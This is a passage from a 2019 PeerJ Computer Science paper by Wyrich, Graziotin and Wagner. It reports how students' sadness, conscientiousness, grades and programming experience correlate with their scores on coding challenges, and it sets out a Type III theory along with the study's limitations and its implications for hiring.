Score P01 O(n) O(n) O(n) 4.0 P02 O(n·log(n)) – O(n) 2.66 P03 O(n2) O(n) O(3n) 2.33 P04 O(n2) O(n) O(3n) 2.33 P05 O(n2) O(n) O(3n) 2.33 P06 O(n2) O(n·w) O(3n) 1.83 P07 O(n2) O(n) – 1.33 P08 O(n2) O(n) – 1.33 P09 O(n2) O(n) – 1.33 P10 O(n2) O(n) – 1.33 P11 O(n2) O(n) – 1.33 P12 O(n2) O(n·w) – 0.83 P13 O(n2) O(n·w) – 0.83 P14 O(n2) O(n·w) – 0.83 P15 O(n2) O(n·w) – 0.83 P16 O(n2) O(n·w) – 0.83 P17 O(n2) O(n·w) – 0.83 P18 O(n2) O(n·w) – 0.83 P19 O(n2) O(n·w) – 0.83 P20 O(n2) O(n·w) – 0.83 P21 O(n2) O(n·w) – 0.83 P22 O(n2) O(n·w) – 0.83 P23 O(n2) – – 0.33 P24 O(n2) – – 0.33 P25 O(n2) – – 0.33 P26 O(n2) – – 0.33 P27 O(n2) – – 0.33 P28 O(n2) – – 0.33 P29 – – – 0.0 P30 – – – 0.0 P31 – – – 0.0 P32 – – – 0.0 Happiness For our participants the average SPANE-P(ositive) value of 22.65 was higher than the average SPANE-N(egative) value of 12.10 and each of the six positive states that contribute to the SPANE-P value were higher on average than their counterparts. The SPANE-B (mean =11.0, sd=6.1), 95% CI [8.76–13.24] affect balance score did not differ significantly from the recently established normative scores for the software developer population (Graziotin et al., 2017). Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 18/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Table 3 Correlation results for happiness. Summary of the correlation coefficients between the coding challenge performance score and items of the Scale of Positive and Negative Experience (SPANE) for op- erationalizing happiness (n=31, * p < .05, rs is Spearman’s rank correlation coefficient). One participant did not indicate the frequency for all of the affective states. For this reason we dropped his or her record. Variable rs SPANE-B 0.055 SPANE-P 0.031 SPANE-N −0.139 positive −0.148 negative 0.166 good −0.030 bad −0.237 pleasant 0.254 unpleasant 0.013 happy −0.149 sad −0.390* joyful −0.062 afraid −0.005 contented −0.052 angry −0.135 Our results show that there is a significant moderate negative relationship between sad and the coding challenge performance score, rs(29)=−0.390, p < .05. With reference to the discussion in the ‘Analysis procedure’ section and for the sake of completeness, for this affective state r(29)=−0.383. As higher values for the affective states stand for higher frequencies, this negative correlation means that participants who had often been sad in the past four weeks tended to perform worse. The Spearman’s rank correlation between bad and the performance score is weak negative, rs(29)=−0.237, and additionally there is a weak positive relationship between pleasant and the performance score, rs(29)=0.254. The p-values for these two correlations are above the significance level of 0.05. Correlation coefficients for other affective states are given in Table 3. Personality For assessing a participant’s personality we used the five factor model which describes a personality by the five traits of extraversion, agreeableness, conscientiousness, neuroticism and openness. Table 4 shows the correlation coefficients between the traits and the coding challenge performance score. What we see from our results is that there is a significant moderate negative relationship between conscientiousness and the performance score, r(30)=−0.352, p < .05. There also is a weak negative relationship between extraversion and the performance score, r(30)=−0.228. For the other three personality traits there is no relationship in our data. Academic performance The variables for the academic performance provide the highest values for Pearson’s r in our data set. From the results shown in Table 5 we see that there is a strong negative Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 19/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Table 4 Correlation results for personality Summary of the correlation coefficients between the Big Five personality traits and the coding challenge performance score (n=32, * p < .05). Variable Pearson’s r extraversion −0.228 agreeableness −0.058 conscientiousness −0.352* neuroticism −0.098 openness 0.069 Table 5 Correlation results for academic performance. Summary of the correlation coefficients between the coding challenge performance score and variables operationalizing the academic performance (* p < .05, rs is Spearman’s rank correlation coefficient, n is the number of participants for whom a measurement was possible). Variable Pearson’s r rs n Current GPA −0.448* 31 B.Sc. GPA (master students only) −0.620 10 Grade for data structures and algorithms course −0.557* 18 Grade for algorithms and complexity course −0.183 19 Study progress 0.179 32 relationship between the performance scores and the grade point averages master students received in their bachelor’s degree, r(8)=−0.620. Also, there is a significant strong negative relationship between the performance scores and the grades for the data structures and algorithms course, r(16)=−0.557, p < .05 and a significant moderate negative relationship between the performance scores and the current grade point average, r(29)=−0.448, p < .05. As in Germany lower grades are better than higher ones, these negative relationships mean that participants with better grades were also the better coding challenge solvers. The grade point average for the data structures and algorithms course was 1.66 (sd=0.79) in our sample and therefore much better than the grade point average for the algorithms and complexity course which was 3.11 (sd=0.83). We only see a weak negative correlation for the latter course with the coding challenge performance score, r(17)=−0.183. Study progress was represented as a three-valued factor: students at the beginning of their bachelor’s program (14 participants), students that are at least in the fourth semester of the bachelor’s program (7 participants) and master students (11 participants). The participants in the first group had an average score of 0.66 (median = 0.83). Those in the second group had a score of 1.89 (median = 1.83). The third group had an average score of 1.07 (median = 0.83). The highest score of 4.0 was achieved by a master student, the maximum score in the group with the advanced bachelor students was 2.66 and the maximum score for the students at the beginning of their bachelor’s program was 1.83. We found a weak positive relationship between the study progress and the performance scores, rs(30)=0.179. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 20/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Table 6 Correlation results for experience. Summary of the correlation coefficients between experience and the coding challenge performance score (n = 32, * p < .05, rs is Spearman’s rank correlation coeffi- cient). Variable Pearson’s r rs Coding challenge experience 0.227 Programming experience 0.420* Java experience 0.184 Work experience 0.196 Experience In the last part of the questionnaires, we asked the participants experience-related questions. Programming experience, experience with Java, and experience with working in a company with focus on software development were measured in years. Experience with coding challenges in the past year was indicated by the participants on a 6-point frequency scale. From Table 6 we see a significant moderate positive relationship between the coding challenge performance score and the programming experience of a participant, r(30)=0.420, p < .05. On average, participants had 5.02 years of programming experience (sd = 2.47). For the work experience, coding challenge experience and the experience with Java we only observed weak positive relationships with the performance score. 21 participants answered that they never had experience with coding challenges in the last year, five participants did coding challenges once or twice per semester, five participants did them once or twice per month and one had experience with coding challenges once per week. When we asked the participants afterwards what their concrete experience with coding challenges was, they mainly told us about exercises they had to do for the algorithms and complexity class and that these exercises were pretty similar to the coding challenges we used in our study. The one participant who indicated to solve coding challenges once a week told us that he or she solves them for fun on the Internet. This participant had the second best coding challenge performance score of 2.66, while the participant with the best performance score of 4.0 had not done any coding challenges in the past year. We finally asked participants for their open-source profiles and their Stack Overflow profile to explore the contributions to the respective communities and see how they correlate with the scores in the coding challenge performance. Of the 32 participants only four participants had a Stack Overflow profile, three of whom have contributed at least one question or answer to the network. The coding challenge performance scores for these three participants were above average, but their contributions were made mainly to fields unrelated to Java, algorithms or programming puzzles. More participants provided us with a URL to their GitHub or GitLab profiles and eight of them contributed at least one public pull request, but we did not observe a relationship between the number of pull requests and the performance score. The eight participants with public open-source contributions had an average performance score of 1.16, which is slightly higher than the average performance score of 0.98 for participants without public open-source contributions. The majority of projects they contributed to were programmed in Java or JavaScript. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 21/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 DISCUSSION Findings We found some significant correlations between individual characteristics and the coding challenge performance. First, we would like to state that we are aware that reporting p-values in exploratory studies is potentially problematic (Rubin, 2017; Neuroskeptic, 2015) because of the open debate of what these p-values really represent (e.g., a null hypothesis significance testing of an absence of relevant factors in the first place). The discussion is so recent that we opted for the conservative choice to use p-values and their classic value for significance (p < .05) as a threshold to include (or exclude) variables in our theory. Our theory provides relationship links—which are of correlation type and not causality—and indications for the polarity of these relationships. The theory, however, does not include numerical assessments of the strength of these relationships. They are outside the scope of an exploratory study towards a Type III theory. Happiness In the ‘Conceptual model’ section we justify happiness as a candidate predictor variable by findings on the positive impact of happiness and affect on job performance and analytic problem-solving. For example, one finding by Graziotin, Wang & Abrahamsson (2014) was that happy software developers perform significantly better in analytic problem-solving. In our study, we could not find a positive correlation between SPANE-B and the coding challenge performance, rs(29)=0.055. We only observed a weak positive relationship between the positive affective state pleasant and the performance, rs(29)=0.254. However, we found that sad software engineers performed significantly worse, rs(29)=−0.390, p < .05. We believe that there could be a cause–effect relationship between sadness and the coding challenge performance because of the participants who felt sometimes or often sad in the past four weeks (approximately 28%), nobody came up with a correct solution to coding challenge 3. Furthermore, for the first two challenges, no one came up with an algorithm different from brute-force solutions. Consequently, none of the sad participants had a score higher than 0.83. One possible explanation for the misalignment between our study results and those of the Graziotin, Wang & Abrahamsson (2014) study results could be that coding challenges constitute an atypical programming task and, therefore, the performance in coding challenges does not necessarily coincide with software development performance. We offer this speculation for future studies to explore. Personality The personality trait conscientiousness showed a significant moderate negative relationship with the coding challenge performance score, r(30)=−0.352, p < .05. This means the higher the score for conscientiousness, the lower the coding challenge performance score. Conscientiousness describes the extent to which a person is a reliable worker, perseveres Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 22/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 until the task is finished, does a thorough job and does things efficiently. A conscientious person is not careless, does not tend to be disorganized or lazy, and is not easily distracted. To understand the relationship between the performance and the personality trait we inspected the answers to the statements of the Big Five inventory of the six participants with the highest performance score. Interestingly, they tended to be reliable workers, which increased their score for conscientiousness, and they did not tend to be easily distracted, which would have lowered their score for the personality trait. Their average score for conscientiousness was 4.17, which is only slightly below the average value of 6.69 for the rest of the sample. Beside Pearson’s r, we also always considered Spearman’s rho to avoid wrong assumptions due to the possibly strong influence of outliers and sequences which are not entirely homoscedastic. Still there was a negative monotonic relationship, rs(30)=−0.294. Although we cannot explain the relationship, based on our findings, we would like to state the hypothesis that conscientious persons perform worse in coding challenges and let future research examine this relationship in more detail. As existing literature found particular personality types to positively correlate with programming task performance (see Cruz, Da Silva & Capretz (2015) for their systematic mapping study) and even that conscientious programmers perform better in programming tasks (Karimi et al., 2016) we would like to repeat our speculation that coding challenges may differ from ordinary programming tasks and invite future studies to investigate the differences. For the other personality traits of the five factor model, i.e., extraversion, agreeableness, neuroticism and openness, we did not observe any significant correlation with the coding challenge performance. Academic performance We found moderate to strong linear correlations between two GPA-related variables and the performance score. The significant moderate negative relationship between the current GPA and the performance score, r(29)=−0.448, p < .05, shows that students with better grades performed better in the coding challenges. Additionally, the Pearson’s correlation coefficient between the B.Sc. GPA and the performance score was strongly negative, r(8)=−0.620, but due to the small number of master students, the relationship could have occurred by chance (p= .056). Many of the bachelor students at the end of the second semester mentioned that their current GPA consisted only of one or two grades. As this group of students made up about 44% of our sample, this should be taken into account. However, because we observed more negative relationships for grade-related variables, it can be reasonably assumed that we would have observed a negative relationship also if students had taken more than one or two exams. There was only a weak positive correlation between study progress and the performance score, rs(30)=0.179, and we observed that the group of higher bachelor semesters performed best. In discussions after the study, participants told us that in the algorithms and complexity course, students nowadays have to solve tasks similar to the coding challenges we used in our study. As this course is usually taken in a higher bachelor semester, this Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 23/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 could have been the reason why they performed better on average than both the younger bachelor students and even the master students since their knowledge was still fresh. Furthermore, as students at the beginning of their bachelor’s program performed worst and master students did not perform much worse than students in a higher bachelor semester, we assume that there is a baseline of knowledge one has to be aware of when solving coding challenges but further academic progress does not necessarily make a coding challenge solver better. Taking all this, and especially the previous paragraph, into consideration, we cannot fully assume that receiving better grades leads to better coding challenge performance. But we can speculate that there is a confounding variable that predicts how well a student performs in his or her exams and how well he or she performs in solving coding challenges. Further, our results show a significant strong negative relationship between the grade for the data structure and algorithms course and the performance score, r(16)=−0.557, p < .05. Again, this negative correlation means that students with better grades were the better coding challenge solvers. For the weak negative relationship between the grade in the algorithms and complexity course and the performance score, r(17)=−0.183, we would like to note that some of the participants were examined by a different examiner and they told us that therefore the exam became easier. A good understanding of data structures and algorithms is fundamental for finding an efficient algorithm to a given coding challenge. Therefore, we assume that a good preparation for the data structure and algorithms exam not only leads to a good grade but also improves the coding challenge performance. Taking this finding one step further, it provides at least an indication of how the targeted preparation for solving coding challenges could have an impact on the coding challenge performance. Experience For the experience-related variables we observed a weak positive relationship between the coding challenge experience and the performance, rs(30)=0.227, between the Java experience and the performance, r(30)=0.184, as well as between the work experience and the performance, rs(30)=0.196. The weak correlation coefficient for the Java experience could be explained by our selection of coding challenges which do not require specific knowledge of the programming language. The positive relationship between the experience with coding challenges and the performance in solving such is in line with what Revilla, Manzoor & Liu (2008) found. They conclude, from statistics of an online judging system, that solving more coding challenges increases the individual acceptance rate and decreases the rate of wrong answers as well as of compilation errors, while the rate of submitted solutions that exceed a given time limit doesn’t change. For problems with a low acceptance rate the wrong answer rate almost remained the same, independently of the number of problems a user solved. Bloomfield & Sotomayor (2016) claim that the biggest success factor for programming competitions are training activities like working through problems and running team sessions in which problems are discussed. Unfortunately, they do not provide evidence other than by reporting their own experience. Although in our sample the best coding challenge solver did not have any experience with coding challenges in the past Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 24/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 year and the overall correlation between coding challenge experience and coding challenge performance is weak, we recommend future research on the effect of targeted preparation for solving coding challenges. In our sample very few people have had experience with coding challenges other than in assignments of university courses. More importantly, we observed a significant moderate linear relationship between the years of programming experience and the coding challenge performance, r(30)=0.420, p < .05. We justified the inclusion of our variables with existing literature, so we expected to find a relationship between experience and coding challenge performance. However, the particular correlation between programming experience in years and a software engineer’s performance in solving a programming task was not consistently observed to be positive in the past. For example, DeMarco & Lister (2013) did not find a correlation between the years of programming experience and the performance in terms of time to complete a programming task, at least not for participants with more than six months’ experience. Those participants with less than six months’ experience performed worse than the rest. The contradictory results could be due to the difference in the programming tasks and the different definitions of performance. Working as fast as possible on an ordinary programming task arguably requires different skills than finding an efficient algorithm to a coding challenge. According to our results we believe that an increase in programming experience leads to a better coding challenge performance. This might only hold true until a threshold is reached but it seems to be greater than the six months observed by DeMarco & Lister (2013). Theory for predicting the performance in solving coding challenges The proposed theory for predicting the performance in solving coding challenges is provided in Fig. 3. We theorize that individual characteristics, such as happiness, personality, academic performance, and experience are predictive for the performance in solving coding challenges. Our theory is meant to be what Gregor (2006) calls a Type III theory. We already gave a brief overview and definition of this theory type in the ‘Background’ section. We used the work of Gregor (2006) as a framework to build and represent our theory. We will now use the framework as a benchmark to discuss how each of the structural components of theory is present in our work. Means of representation is defined as the physical representation of the theory (Gregor, 2006: 620). Our theory is represented by words and a diagram (Fig. 3). Constructs ‘‘refer to the phenomena of interest in the theory’’ and ‘‘all of the primary constructs in the theory should be well defined’’ (Gregor, 2006: 620). Primary constructs of our theory are coding challenges, the coding challenge performance, and the four constructs we refer to as individual characteristics, namely happiness, personality, academic performance and experience. We defined the term coding challenge in the ‘Background’ section as an algorithm and coding problem used to assess a programmer’s problem- solving skills. The performance in solving coding challenges is obtained by aggregating the individual scores for solutions to each one in a set of coding challenges. We describe the scoring algorithm for a single coding challenge and the aggregation algorithm in the ‘Analysis procedure’ section. Algorithm complexity is a highly relevant concept for Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 25/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Individual characteristics - Happiness affective state sad - Personality personality trait conscientiousness + Academic performance GPA and data structures and algorithms course grade + Experience programming experience in years Coding challenge performance Figure 3 Summary of the obtained theory for predicting the performance in solving coding challenges. Connecting lines depict a significant positive or negative correlation between the coding challenge performance and operationalizing variables for each of the four constructs of individual characteristics. Full-size DOI: 10.7717/peerjcs.173/fig-3 obtaining the coding challenge performance score, but we see this construct covered by the definition of the coding challenge performance. Happiness, personality, academic performance and experience have all been defined in the ‘Conceptual model’ section. Statements of relationship ‘‘show relationships among the constructs’’ (Gregor, 2006: 620). Correlations are the degree of relationship between variables of individual characteristics and the coding challenge performance. The affective state of sadness is negatively correlated with the performance in solving coding challenges. The same applies for the personality trait of conscientiousness. GPA and the grade in the data structures and algorithms course are positively correlated with the performance in solving coding challenges. The same applies for programming experience in years. Testable propositions as theory component describes the necessity that statements of relationships can be tested empirically (Gregor, 2006: 620). The statements of relationships in our theory could be tested. We obtained them empirically using proven statistical methods. Furthermore, the paper presents testable propositions of the theory to be further tested by future work. Scope ‘‘is specified by the degree of generality of the statements of relationships (signified by modal qualifiers such as ‘some,’ ‘many,’ ‘all,’ and ‘never’) and statements of boundaries showing the limits of generalizations’’ (Gregor, 2006: 620). The previously defined statements of relationships include no modal quantifiers. We do not believe limitations of our study (see the related section) to have an influence on the scope in which our statements of relationships hold true. It might be the case that in a different context, further variables such as the stress level or the sympathy for the candidate might have an influence on the rated performance. These additional variables could be significant but are believed to not invalidate our statements of relationships. The theory might therefore be refined and extended by further individual characteristics and by contextual variables in the future. Causal explanations and Prescriptive statements are not present due to the nature of Type III theories. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 26/38 https://peerj.com https://doi.org/10.7717/peerjcs.173/fig-3 http://dx.doi.org/10.7717/peerj-cs.173 4We are grateful to two anonymous reviewers for going above and beyond in suggesting challenging and interesting limitations of the study Limitations The study design, as described in the ‘Methods’ section, has some limitations which have to be considered when interpreting the results and defining the scope of our proposed theory. These limitations are about the sample, the adherence to real-world settings, the design of the challenges, and the elements of the theory itself.4 The sample was limited in size and consisted solely of students, all of which were BSc and MSc students from a German university. This limits the way we can generalize our theory as the sample might poorly represent students worldwide as well as job seekers. We believe, however, that our sample, while limited in terms of nationality and place of study, represented the desired population fairly, that is potential hires of successful IT companies. We also ensured that the sample did cover academic status well as we invited students whose academic progress ranges from the beginning of the bachelor’s program to the end of the master’s program. We could not ensure that the settings of our study would fully reflect the settings of a job interview, especially in terms of stress and anxiety and participants’ preparation. In a real-world setting, a job position is at stake and the interviewee is not anonymous and faces the interviewer. In case the candidate has to write source code on a whiteboard, stress and cognitive load are additionally reinforced (Behroozi et al., 2018). Instead, in our study we tried to create a relaxed atmosphere and that is what an interviewer should do. Future work can examine the performance of candidates in real technical interviews and assess the individual characteristics of the candidates. Similarly, our participants did not prepare for solving coding challenges in the past. In real-world settings, a candidate will ideally prepare for the interview, including the coding challenges part. We coped with this issue by operationalizing the variable experience with coding challenges. Not much research has been done yet to examine the effect of targeted preparation for coding challenges so we do not know about its impact and how well our results can be applied to a group of software engineers who all recently prepared for programming interviews or programming competitions. The issue is also less threatening for us as solving the challenges we chose does not require knowledge of particular programming language features or the like that an unprepared software engineer would not have. Future research can repeat our study with prepared participants and see if and how the results differ. Our choice of tasks and their scoring reflects real-world settings as closely as possible, coming all from the related literature, yet it carries several assumptions that we feel should be clarified here. First, we did not assign partial scores for correctness nor did we take into account the quality of the code being produced. As mentioned in section ‘Assessing the coding challenge solutions’ and further discussed by Kemkes, Vasiga & Cormack (2006), different strategies for assessing computing competition tasks have existed for some time. We opted for the All-or-Nothing principle because we have hardly touched any edge or special cases with our software tests, and we have already excluded some special cases by limiting the input parameters in the task description. Consequently, solutions were only marked as incorrect if they really did not correctly implement the basic functionality required. We opted to lose information as the price to pay to ensure objectivity in the assessment. We will elaborate more on this after introducing another potential issue, that Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 27/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 is that we did not consider the quality of the code being produced. We recognize that code quality is relevant, to a certain extent, when programming occurs in an interview. McDowell (2015) lists the following properties for good code that employers want to see: correct, efficient, simple, readable and maintainable. While we looked at the first two properties, correctness and efficiency, we did not consider simplicity, readability, maintainability or other code quality characteristics when we evaluated the solutions. We chose problems to which possible solutions usually should be around ten to twenty lines long, not expecting much variability in the produced code. We also encouraged participants to focus on correctness and efficiency so that our evaluation process was as objective as possible. On our two reasons to opt for the previously mentioned tradeoffs for gaining in objectivity. We performed a sensitivity analysis to establish what would happen if we gave up some objectivity and assigned points for recognizably correct approaches with incorrect implementations. We inspected solutions for which at least one test case failed. For the first challenge, all four incorrect solutions were completely wrong so that we would not have awarded partial points for any of them. For the second challenge, we received 11 incorrect solutions. P02, P23, and P28 were close to a correct solution and we could have awarded partial points for a correct approach. If we had done so, they would have received a score less than 0.5 (less than the score for a correct solution) in the worst time complexity class for this challenge, and this would not change the final ranking of the participants. This is because P23 to P28 would then still have a lesser score than P22. P02 would still be placed second. For the third challenge we find it very difficult to evaluate most of the 26 incorrect approaches scoring 0 points for their partial correctness. They all fail in most test cases and approach the problem in very different ways, but we cannot say how much extra effort would have been needed to arrive at a working solution. For almost half of the incorrect solutions, we concluded that they would not deserve partial points, either because there is no implementation at all or because participants found the solutions to a few values of the input parameter n manually and return them in an if-else-cascade. The other half of the solutions are difficult to compare with each other or with one of the sample solutions so that we cannot objectively give partial points to them at all. The above reasoning on assigning points only to correct solutions and not to judge code quality might introduce a further potential threat to the design of our study, that is that one might conclude that on average, a candidate should strive to answer all questions with suboptimal times; otherwise, attempting to find the ideal time complexity (and failing) could result in performing worse. In parts we agree to this assumption but we do not see it to be severe in the challenges we opted to use. For the first task, the suboptimal solution was arguably very obvious and after the implementation there might not have been enough time to think about the optimal algorithm. Our guess is that most participants would not have come up with the ideal solution even if they had been told what the minimum time complexity is and that they should try to implement such a solution. Our guess is based on informal discussions with the participants that we had after the study and in which we discussed the optimal solution. For the second task, we see no strong difference in effort between the suboptimal solution and the ideal solution, as we believe that only realizing Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 28/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 the optimal solution would drive the participant to its implementation. For the third task, most of the participants already had issues in finding any correct solution at all. Some of the suboptimal solutions we received for this task were also much more complex to implement than the solutions presented in the manuscript. When introducing the participants to the study, we explicitly told them that there was no advantage in submitting a solution before time was up and that they could improve their solution with any remaining time. So even if they had started with a brute-force solution, they would have had a chance to improve their solution. We also recorded the time taken to complete a task. From this data and from their responses to the perceived time pressure, we see that many of the participants had completed at least the first two tasks before the available time had elapsed. We would like to make a few observations on the actual results that we obtained. As one would expect, our 32 participants did not perform equally good in our three tasks. The ability to solve the challenges decreased as difficulty increased (see Table 2). The third and most difficult challenge was solved by only six participants, only two excelled with it and, overall, only one participant obtained the highest possible score. The situation of having one top performer and other five fairly good performers might appear to be a limitation, as it might appear that tasks were too difficult or even that coding challenges are not a suitable tool for job interviews as they are likely to yield high performers. This is by design, and we did not expect many participants to excel overall. Challenge 3, in particular, was intended to separate the really good participants from the average ones. The design of the tasks follows guidelines for coding challenges from the literature (‘Coding challenges’ section), so the coding challenges are tasks that companies adopt for pre-interviews and interviews. Our environment and task successions, while artificial, are supposed to adhere to the real-world situation. The only deviation was that sometimes companies adopt even more tasks than we did, and we could not demand more time from our participants to add more tasks. While it would have been more scientifically interesting to end up with some more top performers, this did not happen, and only repetitions of this study would be able to tell us if that was by chance. Finally, the elements of our conceptual model are just one possibility for forming an initial theory on individual characteristics of coding challenge performance. Many other factors were not included in the model, including but not limited to cognitive processing abilities, further tests for knowledge of the involved domains, and salient characteristics such as sleeping time. To recap, we opted to derive factors from psychology, education, and software engineering literature that have been suggested to correlate with (or cause) performance that is similar to the one we look for. The factors we included are also easily verifiable at interview stage by companies. An alternative to this approach would have been to conduct an exploratory qualitative study to derive a richer set of factors from the experiences and perceptions of participants. However, such a type of study, while interesting and welcome for future work, would have prevented us from providing an initial evaluation of which of those factors are likely to have an influence on the dependent variable. We see that coding challenges are a central and pressing topic in software companies, startups and corporations alike, and we believe that a first quantitative, yet deeper, quantitative exploration brings interesting and practical results than a qualitative, broader yet shallower Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 29/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 exploration. Ultimately, we believe that the robustness of our methodology which closely follows an established framework for theory building, classification, and representation, comprises strong building blocks for future validation studies as well as studies to identify further factors and enrich our theory. Implications The theoretical implications of our study lie in the theory itself. We constructed the theory systematically by inspecting the literature to construct a conceptual model and then performed a first validation of the model in an exploratory study. The theory is thus grounded in empirical data. We request future studies to validate the theory under different settings and samples, as well as extend it with further constructs that we could not include in the present study. Our theoretical contributions provide basic building blocks in the body of knowledge of software engineering research. The practical implications of our theory are limited, yet the results of the study are interesting to software companies and practitioners, should they be generalized. Each company that assesses a candidate’s performance with coding challenges should be aware of the negative correlation between the personality trait of conscientiousness and the candidate’s performance. There is a need for personality diversity in software engineering, among other things, because ‘‘there is no single personality type that fits the wide spectrum of tasks that encompass the engineering of software’’ ([11], p. 10). Some studies showed a relation between personality diversity and team effectiveness, others showed the contrary (Cruz, Da Silva & Capretz, 2015). Conscientiousness is one of a few personality traits which are believed to positively correlate with a software development team’s effectiveness (Yilmaz et al., 2017) and individual satisfaction (Acuña, Gómez & Juristo, 2009). As a consequence, the decision for or against the use of coding challenges for the evaluation of a job candidate’s performance should take the personality diversity of the other team members into account. In case coding challenges have to be solved—whether in technical interviews or in programming competitions—interviewers and organizers should always be interested in the well-being of the coding challenge solvers. This can be seen as a general recommendation regardless of our results which indicate a negative correlation between the affective state ‘‘sad’’ and the coding challenge performance. Google, for example, measured each candidate’s experience with their interview process and found this to be correlated with the proportion of candidates who accept the job offer as well as the percentage of rejected candidates who would still recommend the company to a friend (Google Inc., 2018). However, even when taking care of the overall experience with the interview process, the comparison of two job candidates based on their performance in solving coding challenges could be biased due to differences in their happiness. This might not easily be accessible or directly improvable. A corrective action a company could apply is to give a second chance to candidates for whom the interviewer felt that they would perform better at some other point in time. This would minimize the chance of rejecting actually well fitting candidates who performed badly due to disadvantageous affective states. If a company is in the fortunate situation of having more applicants for a position than the company can assess via on-site interviews using coding challenges, then academic Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 30/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 performance, i.e., GPA and the data structures and algorithms course grade, are good criteria for preselecting candidates based on their resume. GPA is already frequently used as biographical data item for screening applicants as for recruiters, the GPA represents personal motivation as well as language and mathematical capacities (Brown & Campion, 1994). A better GPA results in more first choices and even the decision to list the GPA as biographical information on a resume will do so (Thoms et al., 1999). Our results imply that there is nothing wrong with that with respect to the intention of selecting appropriate candidates for more expensive on-site coding challenge interviews based on their academic performance. From a candidate’s point of view, acquiring knowledge on data structures and algorithms is beneficial for both better course gradings and a better coding challenge performance. Our results further imply that programming experience is also a good criterion for preselecting candidates. Although programming experience in years is something which is usually not directly stated on a resume, experience can be derived from several other resume items. For example, McDowell (2015) advises to build and contribute to projects because having them on the resume ‘‘is often the best way to present yourself as more experienced. This is especially true for college students or recent grads’’ (p. 28). We do not feel that our results indicate to which extent coding challenges are an effective tool for interviewing or even pre-screening job applicants. As we explain in the ‘Limitations’ section, we ended up with a situation of less than 20% of the participants performing well overall and only less than 3% of them (one participant) being a top performer. Coding challenges are capable of filtering out many candidates. While we welcome future studies to investigate whether coding challenges are an effective tool for candidate selection, we urge companies to bear in mind that an absolute score in a coding challenge should not be the only decisive factor in finding good candidates. CONCLUSION The ability to be a successful coding challenge solver is essential in many technical interviews. Yet little research has been conducted on predictor variables for a candidate’s performance, which results in a failure to understand why some people perform better than others in solving coding challenges and ultimately biases hiring decisions. This paper started to fill this research gap by investigating individual characteristics of successful coding challenge solvers. We reported on an exploratory study towards a theory for predicting the coding challenge performance with four constructs, namely happiness, personality, academic performance and experience. It became evident that the affective state sad as well as the personality trait of conscientiousness negatively correlate with the coding challenge performance. GPA, the data structures and algorithms course grade, as well as the programming experience in years positively correlated with the performance. Recruiters and interviewers can take these findings into account when they screen resumes and decide for coding challenges as a means for measuring a candidate’s skills. Being aware of possible predictor variables can reduce hiring costs and bias in hiring decisions by taking suitable measures as we discussed earlier in this work. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 31/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 As we observed a difference between some of our results and the results of previous studies on the relationship between individual characteristics and software development performance, we speculate that coding challenges constitute an atypical programming task. We offer our observations for future studies to better understand them. Moreover, we offer the theory to be tested in future work. Due to the exploratory nature of our study, the observed relationships can be used to establish hypotheses which future work can test. The theory can then be extended, for example, by further individual characteristics and by contextual factors. Taking some of the limitations into consideration, future studies can be designed to be more similar to technical interviews and could conduct such a study with prepared candidates to see how the results differ. Finally, obtaining causal explanations for the relationships might enable the theory to be classified as a theory for explanation and prediction. A better understanding of the underlying causes allows sound recommendations for actions to be made which practitioners can benefit from in the future. ACKNOWLEDGEMENTS We gratefully acknowledge the students who took the time to participate in our study and Kornelia Kuhle for proofreading the work. ADDITIONAL INFORMATION AND DECLARATIONS Funding Daniel Graziotin was supported by the Alexander von Humboldt (AvH) Foundation. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Alexander von Humboldt (AvH) Foundation. Competing Interests The authors declare there are no competing interests. Author Contributions • Marvin Wyrich conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • Daniel Graziotin conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • Stefan Wagner conceived and designed the experiments, contributed reagents/material- s/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Wyrich et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.173 32/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.173 Data Availability The following information was supplied regarding data availability: The raw, anonymized data and the data analysis of the study are available in the Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.173#supplemental-information. REFERENCES Abdalkareem R, Shihab E, Rilling J. 2017. What do developers use the crowd for? A study using stack overflow. IEEE Software 34(2):53–60 DOI 10.1109/MS.2017.31. Acuña ST, Gómez M, Juristo N. 2009. How do personality, team processes and 